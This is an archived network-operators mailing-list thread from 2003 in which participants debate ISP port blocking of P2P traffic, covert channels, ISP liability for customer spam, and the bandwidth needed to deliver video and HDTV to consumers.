And their are legal uses for p2p. I have a customer who works with some of
these technologies for legal and approved file transfers like game
publishing.
Well, blocking TCP SYNs is not a way to block establishment of sessions
between _cooperating_ hosts.
Simply make a small hack in TCP stack to leave SYN flag clear, and use
some other bit instead.
To really block something you need an application proxy... and then there
are always ways to subvert those. Elimination of covert channels is one of
the hardest problems. In any case, no sane provider will restrict traffic
only to applications which can be served by its proxies.
Going further, the growing awareness of the importance of security will
cause more and more legitimate apps to create totally indiscriminate
encrypted traffic... and it is a good idea to routinely encrypt all
traffic, to avoid revealing importance of particular communications.
Leaving identity of applications (different port #s) in the clear is also
a bad idea, security-wise.
--vadim
Date: Mon, 20 Jan 2003 19:59:08 -0800 (PST)
From: Vadim Antonov
Well, blocking TCP SYNs is not a way to block establishment
of sessions between _cooperating_ hosts.
With cooperating hosts, anything goes. Hack up the IP stack, and
have specially-crafted DNS queries carry the ISN. Or use GRE
tunnels. Or have special ICMP Unreachable packets... Sort of
reminds me of the "email me a file" substitute for FTP that was
fairly popular years ago.
To really block something you need an application proxy...
and then there are always ways to subvert those. Elimination
of covert channels is one of the hardest problems. In any
case, no sane provider will restrict traffic only to
applications which can be served by its proxies.
It would be nice if all protocols were proxy-friendly without
requiring proxies. Of course, that does nothing for encrypted
and steganographic traffic. Is elimination of covert channels
even possible? I'd say not.
One of the most useful protocols (SMTP) is virtually always
proxied... rarely does anyone use end-to-end SMTP without any
intervening MX. Allowing customer<-->* traffic vs. intercepting
and/or logging is up to the provider. At least one then can have
known flows to inspect, rather than wondering what the "push the
button" vector is.
Sadly, port perversion seems very common. I've added about a
dozen different ports on my home Squid cache. Any attempts to
demand full RFC compliance seem futile.
It begins to sound like peering... are decisions made based on
technical merit, or on not losing customers who whine because
they demand to use a broken implementation?
Eddy
Vadim - the instant someone sues a Provider for sexual harassment from their
spam epidemic you will start to see things change. The reason that No-Sane
provider will block these ports or services is because they have been
listening to their Network Admins too long, and in fact the problem is that
they are not sane providers. What they are, and this is pretty much true
across the board, is people that just don't care what they do to earn a buck
otherwise we would not have these problems, and this is especially true of
those Network Operators that push all those billions of bytes of illicit
SPAM and throw their hands up and say "What do you expect us to do" - well
the answer is simple. I expect you folks to operate within the law and to
cooperate in stopping people who use your services in violation of the laws.
And if the providers out there don't like that - then they should find other
businesses.
Todd Glassey
We were talking about P2P, not spam. P2P participants _want_ to talk to
each other, unlike spammer and his victims. ISPs already agressively
fight spammers by termninating their service completely - no port blocking
or lawsuits are needed.
Blocking ports is not going to prevent communication between parties which
wish to communicate. And carriage of bits is about an order of magintude
bigger economically than the whole entertaintment industry. RIAA already
was stupid enough to make enemies of telcos (with that Verizon lawsut).
The tech industry was bending themselves over to court Hollywood because
the common wisdom was that the content is going to be what people will pay
for. Wrong. Content-based dotcoms died, and people still pay for
Internet connectivity, in ever-increasing numbers. And spend more and
more time in front of computers instead of TVs. Simply because live
people on the other end of the wire are infinitely more interesting than
the prechewed corporate crud called "content".
So I think we'll see some fireworks on the legal front, but the outcome is
already clear - unfiltered connectivity is what consumers wish to pay for,
not the sanitized disneys.
--vadim
Vadim - the newest form of SPAM uses the Messenger facility to place a
pop-up in the middle of your screen without any email, pop, smtp or other
service being involved. I apologize for the tone of the first posting, but I
still stand by it. When ISP's are held accountable for what people do with
the BW they sell them, then these issues will all be moot. Until then, the
lie is that there is no way to stop these behaviors and its the one the
ISP's proffer exclusively.
Todd
(Taking NANOG out, as this is moving a little towards personal conversation)
Vadim - the instant someone sues a Provider for sexual harassment from
their spam epidemic you will start to see things change. The reason that
No-Sane provider will block these ports or services is because they have
been listening to their Network Admins too long, and in fact the problem
is that they are not sane providers. What they are, and this is pretty
much true across the board, is people that just don't care what they do to
earn a buck otherwise we would not have these problems, and this is
especially true of those Network Operators that push all those billions of
bytes of illicit SPAM and throw their hands up and say "What do you expect
us to do" - well the answer is simple. I expect you folks to operate
within the law and to cooperate in stopping people who use your services
in violation of the laws.And if the providers out there don't like that - then they should find
other businesses.
I think you're *nuts* if you think an ISP should be held entirely
accountable for its customers actions.
I'm one of a handful of administrators in a small ISP, and we do our
damnedest to ensure that everything runs smoothly. We have a fairly strict
AUP that we actually enforce, we do egress filtering (not enough, but we're
working towards it), we contact customers that are infected with virii and
worms, and we have *zero* tolerance for script kiddies (usually instant
blackholes).
IMHO, that is about all you can expect an ISP to do. Have an AUP that
incorporates all of your problems (spam, abuse, viruses, etc), and enforce
it. You can *not* expect the ISP to police absolutely everything that its
customers do. You can *not* expect the ISP to be held responsible for three
of its fifteen thousand customers browsing child porn. You can *not* expect
the ISP to be accountable for its two hundred script kiddies.
You *can* expect the ISP to have an AUP. You *can* expect the ISP to react,
and to react quickly. You *can* expect the ISP to co-operate with the
proper authorities, if it goes to that level. You *can* expect the ISP to
contact and work with (when and where needed) other ISPs to track down and
solve problems.
I am a Network Admin, and I am *still* looking for an effective way to block
outbound spam from our customers. I spent two months purging all our mail
servers of FormMail, and scan them every night for more vulnerable versions.
Do you think that I should be sued because one of these slips through the
cracks (there's a 24-hour window in which one can be installed and abused),
and you get some porn spam? I certainly hope not.
Being able to sue ISPs for their customers actions is pure insanity, and
will just lead to massive ISP shutdown world-wide.
However, being able to sue ISPs for *negligence* and for *ignoring*
customers actions is a whole different boat, and I think is an idea worth
looking at.
- Damian Gerow, an overworked, underpaid, underappreciated Network
Administrator. Strung out on caffeine, because I spent most of last night
hashing out some more details on our anti-spamming actions.
Apparently, I didn't read my own Cc: line. Sorry, folks.
No, we evil network admins are NOT saying there is no way to stop these
behaviors. We're saying that the solutions put such a crimp on open
standards and legitimate behavior that their value is negative. The
problem is a social one, not a technical one. The technical problem is the
vulnerability that exists; the social problem is that as long as ANY
vulnerability exists, people will try to exploit that vulnerability.
Technology can mitigate the vulnerabilities, but it cannot mitigate the
desire to exploit.
For instance, substitute "airport" for "network", as in "airport
security". There are ways for law enforcement to be 100% positive that no
terrorists ever steps foot on a plane. Unfortunately, the cost involved,
along with the reduction in efficiency, would make normal travel
impossible.
Do you try to hold realestate developers responsible for what the
homeowner does with their house? Do you try to hold the power company
responsible for the people who use their electricity to grow weed?
I assume you were beating down the doors of Congress, tyring to get rock
artists to be responsible for the people who committed suicide after
listening to their albums?
Andy
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Andy Dills 301-682-9972
Xecunet, LLC www.xecu.net
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Dialup * Webhosting * E-Commerce * High-Speed Access
Not to mention that fact that 99.99% of current consumer connections are
not up to the task. Standard full-screen video digital stream is ~6Mbps,
HDTV requires 19.4Mbps. Don't know many consumers with T3s. 
As always, it gets down to doing the math, something may dot bombers
weren't (aren't) very good at. AOL/Time Warner is just the first major
example of this 'not yet ready for prime time' business plan. Not to
mention the effect everyone on AOL going to broadband and downloading
Disney clips all the time would have on their settlement plans with
backbone providers.
When fiber-to-the-curb is the norm we'll be able to 'Ride the Light'
Until then, your mileage may vary. You might also see some change in
settlement plans and consumer pricing about that same time.
Best regards,
Al Rowland wrote:
Not to mention that fact that 99.99% of current consumer connections are
not up to the task. Standard full-screen video digital stream is ~6Mbps,
HDTV requires 19.4Mbps. Don't know many consumers with T3s.
VDSL or ADSL2+ would cut it, until fiber to the curb gets the norm. However
many school/university dorms and new housing developments are well networked already so high bandwidth consumer connectivity exists in large numbers.
(where did you think the KaZaa supernodes and DirectConnect hubs are?)
Pete
Not to mention that fact that 99.99% of current consumer connections are
not up to the task. Standard full-screen video digital stream is ~6Mbps,
HDTV requires 19.4Mbps. Don't know many consumers with T3s.
Drifting off-topic, but those are 'raw' data rates. Compression algorithms
along with motion-estimation allow you to get full-screen video down to ~1.5 Mbps with not much in the way of image quality loss.
That puts you into DSL/Wireless range.
As always, it gets down to doing the math, something may dot bombers
weren't (aren't) very good at. AOL/Time Warner is just the first major
example of this 'not yet ready for prime time' business plan. Not to
mention the effect everyone on AOL going to broadband and downloading
Disney clips all the time would have on their settlement plans with
backbone providers.When fiber-to-the-curb is the norm we'll be able to 'Ride the Light'
Until then, your mileage may vary. You might also see some change in
settlement plans and consumer pricing about that same time.
I think you'll see it long before every house has fiber run to it.
My 2 cents anyway.
-Chris
speaking of HDSL over copper, does anyone know anything about a company
called Rose Tekephone that reportedly has an HDTV over T1 service?
1. I also remember when web page standards required you to design
everything to fit in a 640x400 screen. DTV/HDTV will significantly
change your 'not much in the way of image quality loss' yardstick. My
viewing habits have changed significantly in the year plus I've been
DTV/HDTV. Among other things, I go to the movies a lot less. DVD quality
(which is lower than HDTV) is better than most movie theaters and
there's no gum/spilled drink (most of the time) on my floor.
2. I already have it. It's called broadcast. $100 (could have been less
but I always over design) antenna and $20 of coax. No monthly fee. I do
pay for the DirecTV feed, but that's a separate flame war.
Of course, you could just as easily be right.
Best regards,
"Al Rowland" <alan_r1@corp.earthlink.net> writes:
mention the effect everyone on AOL going to broadband and downloading
Disney clips all the time would have on their settlement plans with
backbone providers.
Of course, because you are definitely being kept in the loop regarding
the AOL settlement plans?
/vijay
1. I also remember when web page standards required you to design
everything to fit in a 640x400 screen. DTV/HDTV will significantly
change your 'not much in the way of image quality loss' yardstick. My
viewing habits have changed significantly in the year plus I've been
DTV/HDTV. Among other things, I go to the movies a lot less. DVD quality
(which is lower than HDTV) is better than most movie theaters and
there's no gum/spilled drink (most of the time) on my floor.
Agreed, however the source video that I've seen demoed is from DVD. Side
by side comparison shows slight degradation, but solo viewing is more
than adequate. This also isn't targetted to people at the end of the
bell curve for technology adopters and purists, rather at the fat middle
section that isn't upgrading to ( or doesn't care about ) HDTV yet and
for whom current "digital video" quality is "just fine".
2. I already have it. It's called broadcast. $100 (could have been less
but I always over design) antenna and $20 of coax. No monthly fee. I do
pay for the DirecTV feed, but that's a separate flame war.
Last I checked "premium" channels came via Cable or Satellite. 
If
you have separate DSL line and DirecTV then you are doubling up on
delivery costs. Would the average consumer like to "add" video to their
DSL connection? The cable company cuts you a deal if you have video
and data on the same line. Wouldn't the telco's like to compete in that
market?
Of course, you could just as easily be right.
Who knows? Reality will probably end up somewhere in the middle.
-Chris
Its actually funny you mention this. I'd been working on a way to deliver
television via atm for years just never had much interest. But basically
by attaching to the cloud and then being able to draw pvc's over to dsl
lines it should be quite possible. Don't forget also many of us in given
areas have faster than 1.5 down in my case its 6 down which should be
pleanty for a good tv picture. I'm sure bell would love to put a set top
box in when you buy dsl, maybe even have it part of the shipping package
you get when you join which delivers tv. Give you phone, net and tv over
one pair they should eat that up! Not to mention theoretically isp's
should be able to offer it as well with their own offerings.
Drifting off-topic, but those are 'raw' data rates. Compression algorithms
along with motion-estimation allow you to get full-screen video down to
~1.5 Mbps with not much in the way of image quality loss.
Raw HDTV is about 1.2Gbps. RAW NTSC SDI bitstream is a few hundred.
The 6 and 19.8 are already compressed. Obviously putting more horsepower
to the compression you can achieve smaller data rates. However applying
for example MPEG4 instead of MPEG2 for 1080i or 720p ups the computational
requirements beyond current consumer state of the art.
I think you'll see it long before every house has fiber run to it.
75% is enough.
Pete
Hello;
Drifting off-topic, but those are 'raw' data rates. Compression algorithms
along with motion-estimation allow you to get full-screen video down to
~1.5 Mbps with not much in the way of image quality loss.Raw HDTV is about 1.2Gbps. RAW NTSC SDI bitstream is a few hundred.
The 6 and 19.8 are already compressed. Obviously putting more horsepower
to the compression you can achieve smaller data rates. However applying
for example MPEG4 instead of MPEG2 for 1080i or 720p ups the computational
requirements beyond current consumer state of the art.
The first MPEG-4 HD set top boxes are beginning to appear
http://www.sigmadesigns.com/news/press_releases/030108.htm
Watch this space....
Regards
Marshall Eubanks
I think you'll see it long before every house has fiber run to it.
75% is enough.
Pete
\
T.M. Eubanks
Multicast Technologies, Inc.
10301 Democracy Lane, Suite 410
Fairfax, Virginia 22030
Phone : 703-293-9624 Fax : 703-293-9609
e-mail : tme@multicasttech.com
http://www.multicasttech.com
Test your network for multicast :
http://www.multicasttech.com/mt/
Status of Multicast on the Web :
http://www.multicasttech.com/status/index.html
Andy -